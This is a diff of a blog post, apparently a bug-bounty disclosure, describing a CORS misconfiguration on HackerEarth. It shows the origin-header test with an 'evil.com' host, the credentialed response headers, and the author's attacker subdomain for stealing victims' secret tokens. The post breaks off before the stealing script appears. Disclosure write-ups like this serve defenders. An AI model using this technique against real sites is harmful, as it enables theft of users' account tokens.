dr3dd589/dr3dd589.github.io/_posts/2020-07-10-Hackerearth-secrets-stealing.md

 Hi all,

-I found two bugs in hackerearth. one of them is fixed and other is still not fixed.
+I found two bugs in hackerearth.
+Got T-shirt as swag.

-### 1. cores misconfiguration (fixed)
+### 1. cores misconfiguration

-When i change the origin header in request to `https://www.hackerearth.com.evil.com` the responce i got is:
+When i change the origin header in request to `https://www.hackerearth.com.evil.com` the responce i got was:

 ```python
 Access-Control-Allow-Credentials: true
 Access-Control-Allow-Origin: https://www.hackerearth.com.evil.com
 ```

-I backend regex onlly check for `www.hackerearth.com` after `https://`.
-So i made a subdomain of my site `www.hackerearth.com.dr3dd.live` after passing this domain in request i got the response is:
+The backend regex only checks for `www.hackerearth.com` after `https://`.
+So i made a subdomain of `www.hackerearth.com.dr3dd.live`.
+After sending this subdomain in request as origin header i got below response:

 ```python
 Access-Control-Allow-Credentials: true
 Access-Control-Allow-Origin: https://www.hackerearth.com.dr3dd.live
 ```

-We can see `Access-Control-Allow-Credentials: true` for `www.hackerearth.com.dr3dd.live`.
-So i wrote a small js script to steal secrets tokens of victim.
+As we can see `Access-Control-Allow-Credentials: true` for `www.hackerearth.com.dr3dd.live`.
+Yesss!!
+So i wrote a small js script to steal secrets tokens of victim account.

 ```html
 <!DOCTYPE html>